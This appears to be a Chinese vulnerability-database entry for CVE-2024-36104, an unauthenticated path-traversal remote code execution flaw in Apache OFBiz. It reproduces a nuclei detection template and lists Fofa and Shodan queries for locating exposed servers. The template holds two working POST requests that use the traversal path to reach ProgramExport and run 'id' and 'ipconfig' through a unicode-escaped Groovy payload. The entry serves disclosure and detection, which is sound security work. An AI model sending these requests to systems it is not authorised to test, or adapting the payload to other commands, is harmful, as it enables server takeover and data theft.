漏洞信息
漏洞名称: Apache OFBiz 目录遍历 - 远程代码执行漏洞
漏洞编号:
漏洞类型: 目录遍历
漏洞等级: 严重
漏洞描述: Apache OFBiz是一个开源的企业资源规划(ERP)系统,广泛应用于企业级服务中,提供包括财务、人力资源、供应链管理等多种功能。由于其广泛的应用场景,OFBiz的安全性至关重要。该漏洞存在于OFBiz的webtools组件中,由于对路径名的限制不当,导致攻击者可以利用目录遍历漏洞执行远程代码。具体来说,攻击者通过构造特殊的POST请求,利用路径遍历漏洞访问受限目录,进而执行任意Groovy代码。这种漏洞的根源在于输入验证不足,未能正确过滤用户提供的路径名。此漏洞的严重性在于,攻击者无需任何身份验证即可远程执行代码,可能导致服务器被完全控制,敏感数据泄露,甚至服务中断。由于漏洞的利用方式简单且影响范围广,所有使用受影响版本OFBiz的系统都应立即升级到18.12.14或更高版本以修复此问题。
产品厂商: Apache
产品名称: Apache OFBiz
影响版本: before 18.12.14
搜索语法: app=”Apache_OFBiz”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/e8fcbcfc348ef17d072e29a7acf5f340a0cf4265/http%2Fcves%2F2024%2FCVE-2024-36104.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| id: CVE-2024-36104
info: name: Apache OFBiz Directory Traversal - Remote Code Execution author: Co5mos severity: critical description: | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue. impact: | An attacker can exploit this directory traversal vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data. reference: - http://www.openwall.com/lists/oss-security/2024/06/03/1 - https://issues.apache.org/jira/browse/OFBIZ-13092 - https://lists.apache.org/thread/sv0xr8b1j7mmh5p37yldy9vmnzbodz2o - https://ofbiz.apache.org/download.html - https://ofbiz.apache.org/security.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-36104 cwe-id: CWE-22 epss-score: 0.0.93507 epss-percentile: 0.99856 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: app="Apache_OFBiz" shodan-query: 'title:"OFBiz"' product: ofbiz vendor: apache tags: cve,cve2024,apache,ofbiz,lfi
http: - raw: - | POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
- | POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
matchers-condition: and matchers: - type: regex part: body regex: - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' condition: or
- type: word part: body words: - 'java.lang.Exception'
- type: status status: - 200
|